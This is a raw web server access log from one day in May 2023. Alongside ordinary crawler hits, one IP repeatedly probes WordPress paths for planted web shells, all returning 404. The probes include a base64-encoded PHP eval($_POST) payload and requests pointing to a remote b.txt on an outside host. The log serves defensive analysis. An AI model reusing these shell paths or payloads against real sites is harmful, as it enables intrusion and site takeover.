185.191.171.13 - - [05/May/2023:05:42:24 +0000] "GET /?p=469 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [05/May/2023:05:56:29 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [05/May/2023:05:56:30 +0000] "GET /?p=525 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:05:57:56 +0000] "POST /wp-includes/class-wp-bar.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
185.191.171.45 - - [05/May/2023:06:00:58 +0000] "GET /?p=1949 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:06:06:10 +0000] "POST /wp-content/plugins/akismet/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
185.191.171.17 - - [05/May/2023:06:13:02 +0000] "GET /?p=436 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:06:13:54 +0000] "POST /wp-content/plugins/wordpresss3cll-1/about.php?fuck=you HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:06:20:43 +0000] "POST /wp-content/themes/twentyseventeen/template-parts/post/content-video.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
216.244.66.237 - - [05/May/2023:06:23:42 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:06:26:02 +0000] "POST /wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:06:26:03 +0000] "POST /wp-content/plugins/easyrotator-for-wordpress/c.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
216.244.66.237 - - [05/May/2023:06:32:05 +0000] "GET /?p=224 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:06:33:18 +0000] "GET /?%2Falbums%2Fcrayons%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:06:33:38 +0000] "GET /?%2Falbums%2Faquarelle%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:06:34:54 +0000] "GET /?%2Falbums%2Fcrayons%2Fcontent%2Fflamenco%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:06:36:44 +0000] "GET /wp-admin/css/colors/light/colors.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:06:39:09 +0000] "POST /wp-content/uploads/2022/02/s_e.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
114.119.153.121 - - [05/May/2023:06:48:20 +0000] "GET /wp-sitemap.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
152.89.196.77 - - [05/May/2023:06:49:51 +0000] "POST /wp-admin/update-core-cron.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
185.191.171.1 - - [05/May/2023:06:51:35 +0000] "GET /?p=543 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:06:56:06 +0000] "POST /wp-content/plugins/zyaonqzzll/about.php?fuck=you HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:07:01:46 +0000] "GET /cache/ups.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:07:16:37 +0000] "POST /wp-content/themes/twentyfive/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:07:16:37 +0000] "POST /wp-content/uploads/wp-require.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
216.244.66.237 - - [05/May/2023:07:21:41 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:07:29:59 +0000] "GET /?p=421 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:07:35:40 +0000] "POST /wp-includes/Requests/Exception/HTTPS.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
114.119.136.134 - - [05/May/2023:07:56:55 +0000] "GET /?C=M%3BO%3DA HTTP/1.1" 200 1781 "http://laurencegaudet.com/?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
152.89.196.77 - - [05/May/2023:08:08:52 +0000] "GET /wp-content/uploads/accesson.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.191.171.43 - - [05/May/2023:08:10:12 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [05/May/2023:08:10:12 +0000] "GET /?p=577 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:08:14:46 +0000] "POST /wp-content/plugins/wordpresss3cll/about.php?fuck=you HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
216.244.66.237 - - [05/May/2023:08:20:32 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.1 - - [05/May/2023:08:23:01 +0000] "GET /?p=245 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [05/May/2023:08:26:31 +0000] "GET /?p=620 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [05/May/2023:08:29:22 +0000] "GET /?p=354 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:08:29:27 +0000] "POST /wp-admin/ms-admin-wp.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
216.244.66.237 - - [05/May/2023:08:29:27 +0000] "GET /?p=438 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.13 - - [05/May/2023:08:31:35 +0000] "GET /?p=537 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [05/May/2023:08:31:48 +0000] "GET /?%2Falbums%2Fcroquis-sur-le-vif%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:08:32:10 +0000] "GET /?%2Falbums%2Fcrayons%2Fcontent%2Fserpent%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.5 - - [05/May/2023:08:40:49 +0000] "GET /?p=654 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:08:44:03 +0000] "POST /wp-admin/user/credits-wp.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:08:44:55 +0000] "POST /wp-content/plugins/wordpresss3cll/wp-login.php?komend=gaskan HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:08:48:07 +0000] "POST /wp-content/themes/twentyseventeen/template-parts/post/content-audio.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:08:54:56 +0000] "POST /wp-admin/install-helper-private.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:08:55:01 +0000] "POST /wp-content/themes/astra/inc/builder/type/header/header.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:08:57:54 +0000] "POST /wp-admin/haccess.php?ev=ZXZhbCgkX1BPU1RbIngiXSk7 HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:08:59:13 +0000] "POST /wp-admin/theme-install-private.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
34.217.26.89 - - [05/May/2023:09:07:29 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.211.2.184 - - [05/May/2023:09:07:37 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.211.2.184 - - [05/May/2023:09:07:38 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
152.89.196.77 - - [05/May/2023:09:09:44 +0000] "POST /wp-content/themes/twentyseventeen/template-parts/header/site-branding.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
185.191.171.17 - - [05/May/2023:09:10:35 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [05/May/2023:09:10:37 +0000] "GET /?p=493 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.167.144.162 - - [05/May/2023:09:12:17 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
152.89.196.77 - - [05/May/2023:09:15:15 +0000] "POST /cache/s_e.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.191.171.45 - - [05/May/2023:09:17:30 +0000] "GET /?p=584 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [05/May/2023:09:18:16 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.29.146.160 - - [05/May/2023:09:18:41 +0000] "GET / HTTP/1.1" 200 1781 "-" "-"
152.89.196.77 - - [05/May/2023:09:27:14 +0000] "POST /wp-content/uploads/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:09:27:14 +0000] "POST /wp-includes/system-reboot.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:09:27:15 +0000] "POST /wp-includes/js/dist/dist.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
34.209.236.64 - - [05/May/2023:09:27:36 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
216.244.66.237 - - [05/May/2023:09:31:21 +0000] "GET /?%2Falbums%2Fcroquis-sur-le-vif%2Fcontent%2Fmetro%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:09:32:00 +0000] "POST /.tmb/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
152.89.196.77 - - [05/May/2023:09:37:11 +0000] "POST /wp-includes/js/js.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
185.191.171.16 - - [05/May/2023:09:37:56 +0000] "GET /?p=1042 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [05/May/2023:09:38:58 +0000] "GET /?p=1642 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:09:42:54 +0000] "GET /wp-content/uploads/2020/12/ups.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.191.171.40 - - [05/May/2023:09:44:18 +0000] "GET /?p=641 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:09:48:29 +0000] "POST /wp-content/themes/yuma-blogger/contact.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:09:48:29 +0000] "POST /wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:09:58:43 +0000] "POST /wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:10:04:28 +0000] "POST /wp-admin/network/opengraph.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:10:15:12 +0000] "POST /wp-content/themes/twenty/twenty.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:10:16:09 +0000] "POST /wp-content/plugins/login_wall_evv/comments.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
185.191.171.1 - - [05/May/2023:10:16:38 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [05/May/2023:10:16:38 +0000] "GET /?p=930 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [05/May/2023:10:48:10 +0000] "GET /?p=339 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:10:51:33 +0000] "POST /wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:10:59:32 +0000] "POST /js.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
185.191.171.23 - - [05/May/2023:11:02:18 +0000] "GET /?p=204 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:11:02:18 +0000] "POST /wp-content/themes/flatsome/inc/inc.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.191.171.4 - - [05/May/2023:11:09:12 +0000] "GET /?p=665 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
102.165.51.104 - - [05/May/2023:11:09:44 +0000] "HEAD /adminer.php HTTP/1.1" 404 - "-" "curl/7.68.0"
102.165.51.104 - - [05/May/2023:11:09:45 +0000] "GET /adminer.php HTTP/1.1" 404 16 "-" "curl/7.68.0"
152.89.196.77 - - [05/May/2023:11:10:38 +0000] "POST /wp-content/themes/pinboard/kon.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:11:13:34 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:11:20:00 +0000] "GET /readme.txt HTTP/1.1" 200 652 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:11:21:26 +0000] "GET /?C=D;O=A HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:11:22:39 +0000] "POST /wp-content/export.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
216.244.66.237 - - [05/May/2023:11:25:42 +0000] "GET /?%2Falbums%2Faquarelle%2Fcontent%2Flapins%2F HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.7 - - [05/May/2023:11:27:57 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [05/May/2023:11:27:57 +0000] "GET /?p=506 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [05/May/2023:11:30:29 +0000] "GET /?p=271 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.34 - - [05/May/2023:11:38:16 +0000] "GET /?p=247 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:11:57:47 +0000] "POST /wp-content/plugins/wordpresss3cll-3/about.php?fuck=you HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:12:04:56 +0000] "POST /wp-includes/Requests/Requests.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:12:11:43 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:12:18:32 +0000] "POST /wp-content/plugins/wp-plugin-dependencies/vale.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
216.244.66.237 - - [05/May/2023:12:20:47 +0000] "GET /?p=231 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [05/May/2023:12:20:54 +0000] "GET /?p=766 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
206.189.130.194 - - [05/May/2023:12:24:44 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (X11; CrOS x86_64 14526.89.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.133 Safari/537.36"
216.244.66.237 - - [05/May/2023:12:26:51 +0000] "GET /2020/11/22/beste-nieuwe-casinobonussen/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.2 - - [05/May/2023:12:33:45 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.42 - - [05/May/2023:12:33:48 +0000] "GET /?p=310 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [05/May/2023:12:34:23 +0000] "GET /?p=398 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [05/May/2023:12:39:46 +0000] "GET /?p=1736 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.26 - - [05/May/2023:12:47:53 +0000] "GET /?p=1006 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
152.89.196.77 - - [05/May/2023:12:49:18 +0000] "POST /wp-admin/comment-stream.php?limit=152.89.196.13/b.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.252.119 - - [05/May/2023:12:54:56 +0000] "GET / HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.244.66.237 - - [05/May/2023:13:09:01 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:13:10:35 +0000] "POST /wp-content/uploads/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:13:11:18 +0000] "POST /wp-content/plugins/wordpress-seo/js/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
152.89.196.77 - - [05/May/2023:13:13:33 +0000] "POST /wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
185.191.171.20 - - [05/May/2023:13:17:07 +0000] "GET /?p=222 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [05/May/2023:13:17:54 +0000] "GET /?p=292 HTTP/1.1" 200 1781 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
152.89.196.77 - - [05/May/2023:13:21:32 +0000] "POST /wp-includes/pomo/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
152.89.196.77 - - [05/May/2023:13:23:57 +0000] "GET /wp-content/plugins/xwp/up.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
152.89.196.77 - - [05/May/2023:13:31:55 +0000] "GET /wp-content/system_log.php?bala=up HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:13:39:38 +0000] "POST /wp-includes/sodium_compat/src/src.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
152.89.196.77 - - [05/May/2023:13:43:59 +0000] "POST /wp-content/uploads/bb.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0"
